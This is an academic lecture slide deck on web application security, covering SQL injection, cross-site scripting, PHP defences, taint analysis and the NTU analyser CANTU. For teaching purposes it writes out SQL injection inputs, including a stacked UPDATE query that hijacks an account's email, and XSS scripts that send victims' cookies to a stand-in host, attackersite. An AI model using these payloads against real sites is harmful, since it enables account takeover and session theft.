0% found this document useful (0 votes)
59 views57 pages

Presentation 14 PDF

This document discusses analysis of web application security. It begins by outlining common vulnerabilities like SQL injection and compromised websites. The document then discusses prevention methods like input validation and automated analysis tools. The objectives are outlined as improving current prevention and detection methods. The approach involves developing a new tool called CANTU for analyzing PHP and JavaScript code to detect vulnerabilities.

Uploaded by

raed waheed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
59 views57 pages

Presentation 14 PDF

This document discusses analysis of web application security. It begins by outlining common vulnerabilities like SQL injection and compromised websites. The document then discusses prevention methods like input validation and automated analysis tools. The objectives are outlined as improving current prevention and detection methods. The approach involves developing a new tool called CANTU for analyzing PHP and JavaScript code to detect vulnerabilities.

Uploaded by

raed waheed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 57

Analysis of

Web Application Security


Yih­Kuen Tsay (蔡益坤)
Dept. of Information Management
National Taiwan University
Joint work with Chen‐I Chung, Chih‐Pin Tai, 
Chen‐Ming Yao, Rui‐Yuan Yeh, and Sheng‐Feng Yu
2012/11/28 @ JST
Caveats
” Concern mainly with security problems 
resulted from program defects
” Will use PHP and JavaScript for illustration, 
though there are many other languages
” Means of analysis in general
• Testing and simulation
• Formal verification
 Algorithmic: static analysis, model checking
 Deductive: theorem proving
• Manual code review
2012/11/28 @ JST Analysis of Web Application Secuirty 2
Personal Perspective
” I am a formal verification person, seeking 
practical uses of my expertise.
” Web application security is one of the very few 
practical domains where programmers find 
program analyzers useful/indispensable.
” There are challenging problems unsolved by 
current commercial tools.

2012/11/28 @ JST Analysis of Web Application Secuirty 3


Outline
” Introduction
” Common Vulnerabilities and Defenses
” Objectives and Challenges
” Opportunities
” Our Approach: CANTU
” Conclusion

2012/11/28 @ JST Analysis of Web Application Secuirty 4


How the Web Works
Client side Server side

1
Interact with 2
the browser 3
Request for a Web page
Retrieve/generate
the page, possibly
Browser using data from
Delivery of the page in the database and
HTML + scripts adding client-side
scripts to enrich
User 4 functionalities

Display the
page and 5
execute client-
side scripts on
the page

Note: cookies or the equivalent are typically used for maintaining sessions.
2012/11/28 @ JST Analysis of Web Application Secuirty 5
Web Applications
” Web applications refer mainly to the 
application programs running on the server.
” Part of a Web application may run on the client.
” Together, they make the Web interactive, 
convenient, and versatile.
” Online activities enabled by Web applications:
• Hotel/transportation reservation,
• Banking, social networks, etc.
” As such, Web applications  often involve user’s 
private and confidential data.
2012/11/28 @ JST Analysis of Web Application Secuirty 6
Web Applications: Dynamic Contents
<?
$link =  mysql_connect(‘localhost’,‘username’,‘password’);  // connect to 
database
$db =  mysql_select_db(‘dbname’,$link); 

fixInput();  // invoke a user‐defined  sanitization function to validate all inputs

$user=$_POST[‘account’];

// fetch and display account information
$query="SELECT id, name, description  FROM project WHERE  
user_account=‘ ".$user.“ ‘ " ;
$query_result = mysql_query($query);
while ($result=mysql_fetch_row($query_result)) {
echo ‘<table>’;
echo ‘<tr>’;
echo ‘<td width=“100px”>’.$result[0].’</td>’;
echo ‘<td width=“100px”>’.$result[1].’</td>’;
echo ‘<td width=“100px”>’.$result[2].’</td>’;
echo ‘</tr>’;
echo ‘</table>’;
} @ JST
2012/11/28 Analysis of Web Application Secuirty 7
?>
Web Applications: Client-Side Script
<html>
<head>
<title>Example 2</title>
<script type=‘text/javascript’>
function submit_form(){

if(document.getElementById(‘user_account’).value!=“”){
document.getElementById(‘project_form’).submit();
}

}
</script>
</head>
<body>
<form id=‘project_form’ action=‘my_project.php’ method=‘POST’>
<input type=‘text’ name=‘user_account’ id=‘user_account’ />
<input type=‘button’  value=‘OK’ onclick=‘submit_form();’ />
<input type=‘reset’ value=‘Reset’ />
</form>
</body>
</html>
2012/11/28 @ JST Analysis of Web Application Secuirty 8
Vulnerable Web Applications
” Many Web applications have security 
vulnerabilities that may be exploited by the 
attacker.
” Most security vulnerabilities are a result of bad 
programming practices or programming 
errors.
” The possible damages:
• Your personal data get stolen.
• Your website gets infected or sabotaged.
• These may bare financial or legal consequences.
2012/11/28 @ JST Analysis of Web Application Secuirty 9
A Common Vulnerability: SQL Injection

” User’s inputs are used as parts of an SQL query, 
without being checked/validated.
” Attackers may exploit the vulnerability to read, 
update, create, or delete arbitrary data in the database.
” Example (display all users’ information):
• Relevant code in a vulnerable application:
$sql = “SELECT * FROM users WHERE id = ‘” . $_GET[‘id’] . “’”;
• The attacker types in 0’ OR ‘1’ = ‘1 as the input for id.
• The actual query executed:
SELECT * FROM users WHERE id = ‘0’ OR ‘1’ = ‘1’;
• So, the attacker gets to see every row from the users
2012/11/28table.
@ JST Analysis of Web Application Secuirty 10
SQL Injection (cont.)
Vulnerable
Attacker User
Website

1. Send an HTTP request 
with id = 1128

2. The server returns the 
user data with id=1128
(SQL query: 
SELECT * FROM user 
WHERE id=‘1128’;)

1. Send an HTTP request with id = 0’ OR ‘1’=‘1 

2. The server returns all tuples in the user table 
(SELECT * FROM user WHERE id=‘0’ OR ‘1’=‘1’;)

message User aware of message User unaware of
2012/11/28 @ JST Analysis of Web Application Secuirty 11
Compromised Websites
” Compromised legitimate websites can 
introduce malware and scams.
” Compromised sites of 2010 include 
• the European site of popular tech blog TechCrunch,
• news outlets like the Jerusalem Post, and 
• local government websites like that of the U.K.’s 
Somerset County Council.
” 30,000 new malicious URLs every day.

Source: Sophos security threat report 2011 
2012/11/28 @ JST Analysis of Web Application Secuirty 12
Compromised Websites (cont.)
” More than 70% of those URLs are legitimate 
websites that have been hacked or 
compromised. 
” Criminals gain access to the data on a 
legitimate site and subvert it to their own ends. 
” They achieve this by 
• exploiting vulnerabilities in the software that 
power the sites or 
• by stealing access credentials from malware‐
infected machines. 
Source: Sophos security threat report 2011 
2012/11/28 @ JST Analysis of Web Application Secuirty 13
Prevention
” Properly  configure the server
” Use secure application interfaces
” Validate (sanitize) all inputs from the user and 
even the database
” Apply detection/verification tools and repair 
errors before deployment
• Commercial tools
• Free tools from research laboratories

2012/11/28 @ JST Analysis of Web Application Secuirty 14


Outline
” Introduction
” Common Vulnerabilities and Defenses
” Objectives and Challenges
” Opportunities
” Our Approach: CANTU
” Conclusion

2012/11/28 @ JST Analysis of Web Application Secuirty 15


OWASP Top 10 Application Security Risks

” Injection
” Cross‐Site Scripting (XSS)
” Broken Authentication and Session Management
” Insecure Direct Object Reference
” Cross‐Site Request Forgery (CSRF)
” Security Misconfiguration
” Insecure Cryptographic Storage
” Failure to Restrict URL Access
” Insufficient Transport Layer Protection
” Unvalidated Redirects and Forwards

2012/11/28 @ JST Analysis of Web Application Secuirty 16


What Changed from 2007 to 2010

2012/11/28 @ JST Analysis of Web Application Secuirty 17


SQL Injection (cont.)
” Example:
Forgot Password
Email:
We will send your account information to your email address. 

$sql = “SELECT login_id, passwd, full_name, email
relevant code: FROM users 
WHERE email = ‘” . $_GET[‘email’] . “’”;

” The attacker may set things up to steal the account of 
Bob ([email protected]) by fooling the server to 
execute: SELECT login_id, passwd, full_name, email
FROM users 
WHERE email = ‘x’; 
UPDATE users 
SET email = ‘[email protected]
2012/11/28 @ JST Analysis of Web Application Secuirty
WHERE email = ‘[email protected]’; 18
Defenses against SQL Injection in PHP
” Sources (where tainted data come from)
• $_GET, $_POST, $_SERVER, $_COOKIE, $_FILE, 
$_REQUEST, $_SESSION
” Sinks (where tainted data should not be used)
• mysql_query(), mysql_create_db(), 
mysql_db_query (), mysql_drop_db(), 
mysql_unbuffered_query()
” Defenses
• Parameter: magic_quotes_gpc
• Built‐in function: addslashes
• Prepared statements (for database accesses)
2012/11/28 @ JST Analysis of Web Application Secuirty 19
Defenses against SQL Injection (cont.)
” Set the magic_quotes_gpc parameter on in the PHP 
configuration file.
• When the parameter is on, ' (single‐quote), " (double 
quote), \ (backslash) and NULL characters are escaped 
with a backslash automatically.
” Built‐in function: addslashes( string $str )
• The same effect as setting magic_quotes_gpc on 
<?php
$str = "Is your name O‘Brien?";
echo addslashes($str);
// Output: Is your name O\‘Brien?
?> 

2012/11/28 @ JST Analysis of Web Application Secuirty 20


Defenses against SQL Injection (cont.)
” Prepared statements
• Set up a statement once, and then execute it many times 
with different parameters.
• Example:
$db_connection = new mysqli("localhost", "user", "pass", "db"); 
$statement = $db_connection‐>prepare("SELECT * FROM users WHERE id 
= ?"); 
$statement‐>bind_param("i", $id);
$statement‐>execute(); ...

• To execute the above query, one needs to supply the 
actual value for ? (which is called a placeholder).
• The first argument of bind_param() is the input’s type: 
i for int, s for string, d for double
2012/11/28 @ JST Analysis of Web Application Secuirty 21
Cross-Site Scripting (XSS)
” The server sends unchecked/unvalidated data to 
user’s browser.
” Attackers may exploit the vulnerability to execute 
client‐side scripts to:
• Hijack user sessions
• Deface websites
• Conduct phishing attacks
” Types of cross‐site scripting :
• Stored XSS
• Reflected XSS

2012/11/28 @ JST Analysis of Web Application Secuirty 22


Stored XSS
Vulnerable
Attacker Victim
Website

1. Post a malicious message onto the bulletin board.
<script>document.location=
“http://attackersite/collect.cgi?cooki 2. Logon request
e=”
+ document.cookie;
</script> 3. Set‐Cookie: …

4. Read the bulletin board

5. Show the malicious script
6. The victim's browser runs the  <script>document.location=
“http://attackersite/collect.cgi?cooki
script and transmits the cookie to  e=”
the attacker. + document.cookie;
</script>
message Victim aware of message Victim unaware of
2012/11/28 @ JST Analysis of Web Application Secuirty 23
Reflected XSS
Vulnerable
Attacker Victim
Website
1. Logon request
2. Set‐Cookie: ID=A12345
3. Request by clicking unwittingly 
a link to Attacker’s site
4. 
<HTML> 5. 
<a href=‘http://vulnerablesite/welcome.cgi?  <HTML>
name=<script>window.open(%27http:// <a href=‘http://vulnerablesite/welcome.cgi? 
attackersite/collect.cgi?cookie=%27%2Bdoc name=<script>window.open(%27http://
ument.cookie);</script>’>vulnerablesite</a attackersite/collect.cgi?cookie=%27%2Bdoc
> ument.cookie);</script>’>vulnerablesite</a
>
6.
<HTML>
7.  <Title>Welcome!</Title>Hi 
http://attackersite/collect.cgi?cookie=ID= <script>window.open(‘http://attackersite
A12345 /collect.cgi?cookie =’+document.cookie);
(cookie stolen by the attacker) </script>
message Victim aware of message Victim unaware of
2012/11/28 @ JST Analysis of Web Application Secuirty 24
Defenses against Cross-Site Scripting in PHP

„ Sources (assumption: the database is not tainted)
• $_GET, $_POST, $_SERVER, $_COOKIE, $_FILE, 
$_REQUEST, $_SESSION
„ More Sources (assumption: the database is tainted)
• mysql_fetch_array(), mysql_fetch_field(), 
mysql_fetch_object(), mysql_fetch_row(), …
” Sinks
• echo, printf, …
” Defenses 
• htmlspecialchars()
• htmlentities()
2012/11/28 @ JST Analysis of Web Application Secuirty 25
Defenses against Cross-Site Scripting (cont.)
” Built‐in function: htmlspecialchars( string $str [, int
$quote_style = ENT_COMPAT])
• Convert special characters to HTML entities
 '&' (ampersand) becomes '&amp;' 

 '"' (double quote) becomes '&quot;' when 

ENT_NOQUOTES is not set. 
 ''' (single quote) becomes '&#039;' only when 

ENT_QUOTES is set. 
 '<' (less than) becomes '&lt;' 

 '>' (greater than) becomes '&gt;' 

<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new; // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
?> 
2012/11/28 @ JST Analysis of Web Application Secuirty 26
Defenses against Cross-Site Scripting (cont.)

” Built‐in function: htmlentities( string $string [, int
$quote_style = ENT_COMPAT] )
• the same effect with built‐in function: 
htmlspecialchars()
<?php
$orig = "I'll \"walk\" the <b>dog</b> now";
$a = htmlentities($orig);
$b = html_entity_decode($a);
echo $a; // I'll &quot;walk&quot; the &lt;b&gt;dog&lt;/b&gt;
now
echo $b; // I'll "walk" the <b>dog</b> now
?>

2012/11/28 @ JST Analysis of Web Application Secuirty 27


Outline
” Introduction
” Common Vulnerabilities and Defenses
” Objectives and Challenges
” Opportunities
” Our Approach: CANTU
” Conclusion

2012/11/28 @ JST Analysis of Web Application Secuirty 28


Current Status
” Most known Web application security 
vulnerabilities can be fixed.
” There are code analysis tools that can help to 
detect such security vulnerabilities.
” So, what are the problems?

2012/11/28 @ JST Analysis of Web Application Secuirty 29


An Example
PHP code
01  <?php
02        $id = $_POST["id"]; 
03        $dept = $_POST["dept"];
04        if ($dept == 0) {                    //guest
05 echo "Hello! guest";
06 displayWelcomePage();   
07        }
08        else {                                      // staff
09 if ($id == "admin") {       
10 echo "Hello! ".$id;
11 displayManagementFun();
12  } 
13 else { 
14 echo "Hello! ".$dept.$id; 
15 displayBasicFun();
16             }
17        } 
18  ?>
2012/11/28 @ JST Analysis of Web Application Secuirty 30
Control Flow Graph
02:  $id = $_POST["id"]; 
03:  $dept = $_POST["dept"];

True False
$dept == 0

05:  echo "Hello! guest"; True False


$id == "admin"
06:  displayWelcomePage();

10:  echo "Hello! ".$id; 14:  echo "Hello! ".$dept.$id;
11:  displayManagementFun(); 15:  displayBasicFun();

Exit
2012/11/28 @ JST Analysis of Web Application Secuirty 31
Dependency Graph (1/3)
02:  $id = $_POST["id"]; 
03:  $dept = $_POST["dept"]; $_POST["dept"], 3 $_POST["id"], 2

Untainted Tainted

"Hello! Guest", 5 $dept, 3 $id , 2


$dept == 0
Untainted Untainted Tainted
True

05:  echo "Hello! guest"; echo, 5
06:  displayWelcomePage();
Untainted

Exit

2012/11/28 @ JST Analysis of Web Application Secuirty 32


Dependency Graph (2/3)
02:  $id = $_POST["id"];  $_POST["dept"], 3 $_POST["id"], 2
03:  $dept = $_POST["dept"];
Tainted Tainted

"Hello! ", 10 $dept, 3 $id , 2


$dept == 0
Untainted Tainted Tainted
False

$id == "admin"

str_concat, 10
True

10:  echo "Hello! ".$id; Tainted
11:  displayManagementFun();
echo, 10

Exit Tainted
Note: a better analysis would take into account $id == “admin”.
2012/11/28 @ JST Analysis of Web Application Secuirty 33
Dependency Graph (3/3)
02:  $id = $_POST["id"];  $_POST["dept"], 3 $_POST["id"], 2
03:  $dept = $_POST["dept"];
Tainted Tainted

"Hello! ", 14 $dept, 3 $id , 2


$dept == 0
Untainted Tainted Tainted
False
str_concat, 14
$id == "admin"
Tainted
False

14:  echo "Hello! ".$dept.$id; str_concat, 14
15:  displayBasicFun();
Tainted
echo, 14
Exit
Tainted
2012/11/28 @ JST Analysis of Web Application Secuirty 34
Alias
PHP code Dependency Graph
01  <?php
02        $a = "message"; $_GET["msg"], 4
03        $b = &$a; 
04        $a= $_GET["msg"];  Tainted
05        echo $b;
$b, 3 $a, 4
06  ?>
Tainted Tainted
alias
echo, 5
Tainted

Alias Information
must‐alias{(a,b)}

2012/11/28 @ JST Analysis of Web Application Secuirty 35


Detecting Vulnerabilities by Taint Analysis

” All inputs from a source are considered tainted.
” Data that depend on tainted data are also 
considered tainted.
” Some functions may be designated as 
sanitization functions (for particular security 
vulnerabilities).
” Values returned from a sanitization function 
are considered clean or untainted.
” Report vulnerabilities when tainted values are 
used in a sink.
2012/11/28 @ JST Analysis of Web Application Secuirty 36
Problems and Objectives
” Four problems (among others) remain:
• Existing code analysis tools report too many false 
positives.
• They rely on the programmer to ensure correctness 
of sanitization functions.
• Many tools report false negatives in some cases.
• Web application languages/frameworks are 
numerous and hard to catch up.
” We aim to solve the first three problems and 
alleviate the fourth.
2012/11/28 @ JST Analysis of Web Application Secuirty 37
Use of a Code Analysis Tool
Source code, Code analysis tool
Web pages Analysis results

Website Manual review

Improvement Analysis report


recommendations Review meeting

Note: fewer false positives means less workload for the human reviewer.
Note: there may be possible feedback loops between two tasks.
2012/11/28 @ JST Analysis of Web Application Secuirty 38
Challenges
” Dynamic features of scripting languages 
popular for Web application development:
• Dynamic typing
• Dynamic code generation and inclusion
” Other difficult language features:
• Aliases and hash tables
• Strings and numerical quantities
” Interactions between client‐side code, server‐
side code, databases, and system configurations
” Variation in browser and server behaviors
2012/11/28 @ JST Analysis of Web Application Secuirty 39
Challenges: Alias Analysis
” In PHP, aliases may be introduced by using the 
reference operator “&”.
PHP Code PHP Code
<?php <?php
$a=“test”;  // $a: untainted $a="test";     // $a: untainted
$b=&$a;     //  $a, $b: untainted $b=&$a;        // $a, $b: untainted  
$a= $_GET[“msg”];  // $a ,$b: tainted. grade();
echo $b;     // XSS vulnerability function grade()
?> {
$a=$_GET["msg"]; // $a , $b: tainted.
}
echo $b;   ?> // XSS vulnerability

‡Tool A: false negative ‡Tool A: false negative


‡Tool B: true positive ‡Tool B: false negative
Note: Tool A and Tool B are two popular commercial code analysis
2012/11/28 @ JST Analysis of Web Application Secuirty 40
tools.
Challenges: Alias Analysis (cont.)
” None of the existing tools (that we have tested) 
handles aliases between objects. 
PHP Code
<?php
class car{
var $color;
function set_color($c){
$this‐>color = $c;
}
}
$mycar = new car;
$mycar‐>set_color("blue");
$a_mycar = &$mycar;
$a_mycar‐>set_color
( "<script>alert('xss')</script>“);
echo $mycar‐>color."<br>";
?>
2012/11/28 @ JST Analysis of Web Application Secuirty 41
Challenges: Strings and Numbers
1  if($_GET[‘mode’] == "add"){
2     if(!isset($_GET[‘msg’]) || !isset($_GET[‘poster’])){
3          exit;
4      }
5      $my_msg = $_GET[‘msg’];
6      $my_poster = $_GET[‘poster’];
7      if (strlen($my_msg) > 100 && !ereg(“script",$my_msg)){
8          echo "Thank you for posting the message $my_msg";
9      }
10  }
11  …

” To exploit the XSS vulnerability at line 8, we 
have to generate input strings satisfying the 
conditions at lines 1, 2, and 7, which involve 
both string and numeric constraints.
2012/11/28 @ JST Analysis of Web Application Secuirty 42
Challenges: A Theoretical Limitation
” Consider the class of programs with:
• Assignment
• Sequencing, conditional branch, goto
• At least three string variables
• String concatenation (or even just appending a 
symbol to a string)
• Equality testing between two string variables
” The Reachability Problem for this class of 
programs is undecidable.

2012/11/28 @ JST Analysis of Web Application Secuirty 43


Outline
” Introduction
” Common Vulnerabilities and Defenses
” Objectives and Challenges
” Opportunities
” Our Approach: CANTU
” Conclusion

2012/11/28 @ JST Analysis of Web Application Secuirty 44


Research Opportunities
” Advanced and integrated program analyses
” Formal certification of Web applications
” Development methods (including language 
design) for secure Web applications
” A completely new and secure Web (beyond 
http‐related protocols)

2012/11/28 @ JST Analysis of Web Application Secuirty 45


Business Opportunities:
Code Review/Analysis Service
” This requires a combination of knowledge
• Security domain
• Program analysis
• Program testing
• Review process
” There are real and growing demands!
” A few industry and academic groups are 
building up their capabilities.

2012/11/28 @ JST Analysis of Web Application Secuirty 46


Outline
” Introduction
” Common Vulnerabilities and Defenses
” Objectives and Challenges
” Opportunities
” Our Approach: CANTU
” Conclusion

2012/11/28 @ JST Analysis of Web Application Secuirty 47


CANTU (Code Analyzer from NTU)
” It is an integrated environment for analyzing 
Web applications.
” Main features:
• Building on CIL, to treat different languages and 
frameworks
• Dataflow analysis across client, server, database, 
and system configurations
• Incorporating dynamic analysis to confirm true 
positives

2012/11/28 @ JST Analysis of Web Application Secuirty 48


Architecture of CANTU
PHP HTML JavaScript SQL Database Configuration

Parser Parser Parser Parser Translator Translator

CIL Intermediate Representation

Static Analysis Dynamic Testing


Dataflow Vulnerability Test Cases Vulnerability
Analysis Detection Generation Confirmation

Analysis Results

2012/11/28 @ JST Analysis of Web Application Secuirty 49


Components of Static Analysis
PHP Web  Python Web  Other Web 
Applications Applications Applications

Parse Python 
Parse PHP to C AST Parse … to C AST
to C AST

C Abstract Syntax Tree

Convert C AST to CIL

CIL Intermediate 
Representation

Data Flow  Sanitization Function  HTML  Other Static 


Taint Analysis
Analysis Verification Validation Analyses

Integrated Analysis Results

2012/11/28 @ JST Analysis of Web Application Secuirty 50


Representing PHP Variables in CIL
struct array{
struct hashtable *val;
struct hashtable *index;
};
union mixed {
short bval;
long inum;
double fnum;
char* str;
struct array arr;
void* object; 
char* resource;
} ;
struct variable{
enum phpt {BOOL, INT, FLOAT, STR, ARRAY, OBJECT, RESOURCE, NULLType
} val_type;
union mixed val;
};
2012/11/28 @ JST Analysis of Web Application Secuirty 51
Executing
Client
Generated Tests
Server
runTest.php
CANTU /*
Project: project1 instrument
javascript code
Vul: */
1.XSS testcase1 …
2.SQL injection testcase2 /*
redirect to testcase1.xml
the entry page <TestCase>
*/ <vulnerability>Reflected XSS
</vulnerability>
redirect(“a.php”); <precondition></precondition>
<scenario>
<step>
<id>1</id>
a.php simulate.js <page>a.php</page>

/* getStep.php <action>browse</action>
<target></target>
<typingString></typingString>
original code Uses the ajax /* </step>

<!-- instrument code --> method to get Get a test step ….


<expectedValue>

<script src=“simulate.js”> test info */ <type>document.title</type>


<info>XSS</info>
</script> */ </expectedValue>
<result></result>
… </TestCase>

/* verify.php
manipulate /*
the webpage verify
*/ */
2012/11/28 @ JST … Analysis of Web Application Secuirty 52
Outline
” Introduction
” Common Vulnerabilities and Defenses
” Objectives and Challenges
” Opportunities
” Our Approach: CANTU
” Conclusion

2012/11/28 @ JST Analysis of Web Application Secuirty 53


Conclusion
” Web application security has drawn much 
attention from the public, the industry, and the 
academia.
” Making Web applications secure requires a 
combination of expertise in different areas.
” This provides great opportunities for 
research/development collaboration.
• CANTU represents our vision of this collaboration.
” It should also create good opportunities for 
starting new businesses.
2012/11/28 @ JST Analysis of Web Application Secuirty 54
Selected References
” Huang et al., “Securing Web Application Code by 
Static Analysis and Runtime Protection,” WWW 
2004.
” Minamide,“Static Approximation of Dynamically 

Generated Web Pages,” WWW 2005.
” Xie and Aiken, “Static Detection of Security 

Vulnerabilities in Scripting Languages,” USENIX 
Security Symposium 2006.
” Su and Wassermann, “The Essence of Command 

Injection Attacks in Web Applications,” POPL 2006.
” Chess and West, Secure Programming with Static 

Analysis, Pearson Education, Inc. 2007.
2012/11/28 @ JST Analysis of Web Application Secuirty 55
Selected References (cont.)
” Lam et al., “Securing Web Applications with Static 
and Dynamic Information Flow Tracking,” PEPM 
2008.
” Yu et al., “Verification of String Manipulation 

Programs Using Multi­Track Automata,” Tech 
Report, UCSB, 2009.
” Yu et al., “Generating Vulnerability Signatures for 

String Manipulating Programs Using Automata­
based Forward and Backward Symbolic Analyses,” 
IEEE/ACM ICASE 2009.
” Kiezun et al., “Automatic Creation of SQL Injection 

and Cross­Site Scripting Attacks,” ICSE
2012/11/28 @ JST Analysis of Web Application Secuirty 2009. 56
Selected References (cont.)
” OWASP, http://www.owasp.org/.
” The CVE Site, http://cve.mitre.org/.
” C.‐P. Tai, An Integrated Environment for Analyzing Web 
Application Security, Master’s Thesis, NTU, 2010.
” R.‐Y. Yeh, An Improved Static Analyzer for Verifying PHP 
Web Application Security, Master’s Thesis, NTU, 2010.
” S.‐F. Yu, Automatic Generation of Penetration Test Cases 
for Web Applications, Master’s Thesis, NTU, 2010.

2012/11/28 @ JST Analysis of Web Application Secuirty 57

You might also like